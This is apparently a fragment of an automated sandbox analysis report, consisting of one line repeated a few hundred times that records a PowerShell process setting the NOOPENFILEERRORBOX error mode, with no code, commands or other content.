                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
